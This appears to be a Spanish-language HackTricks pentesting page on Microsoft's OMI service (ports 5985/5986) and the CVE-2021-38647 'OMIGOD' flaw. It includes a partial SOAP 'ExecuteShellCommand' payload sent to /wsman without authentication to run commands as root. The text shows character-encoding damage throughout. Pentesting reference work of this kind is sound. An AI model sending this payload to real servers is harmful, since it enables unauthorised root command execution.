5985,5986 - Pentesting OMI
Reading time: 2 minutes
tip
Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apoya a HackTricks
- Revisa los planes de suscripci贸n!
- 脷nete al 馃挰 grupo de Discord o al grupo de telegram o s铆guenos en Twitter 馃惁 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a HackTricks y HackTricks Cloud repos de github.
Informaci贸n B谩sica
OMI se presenta como una herramienta de c贸digo abierto de Microsoft, dise帽ada para la gesti贸n de configuraci贸n remota. Es particularmente relevante para servidores Linux en Azure que utilizan servicios como:
- Azure Automation
- Azure Automatic Update
- Azure Operations Management Suite
- Azure Log Analytics
- Azure Configuration Management
- Azure Diagnostics
El proceso omiengine
se inicia y escucha en todas las interfaces como root cuando se activan estos servicios.
Los puertos predeterminados utilizados son 5985 (http) y 5986 (https).
Vulnerabilidad CVE-2021-38647
Como se observ贸 el 16 de septiembre, los servidores Linux desplegados en Azure con los servicios mencionados son susceptibles debido a una versi贸n vulnerable de OMI. Esta vulnerabilidad radica en el manejo de mensajes del servidor OMI a trav茅s del endpoint /wsman
sin requerir un encabezado de Autenticaci贸n, autorizando incorrectamente al cliente.
Un atacante puede explotar esto enviando una carga 煤til SOAP "ExecuteShellCommand" sin un encabezado de Autenticaci贸n, obligando al servidor a ejecutar comandos con privilegios de root.
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>
Para m谩s informaci贸n sobre este CVE check this.
Referencias
- https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/
- https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/
tip
Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apoya a HackTricks
- Revisa los planes de suscripci贸n!
- 脷nete al 馃挰 grupo de Discord o al grupo de telegram o s铆guenos en Twitter 馃惁 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a HackTricks y HackTricks Cloud repos de github.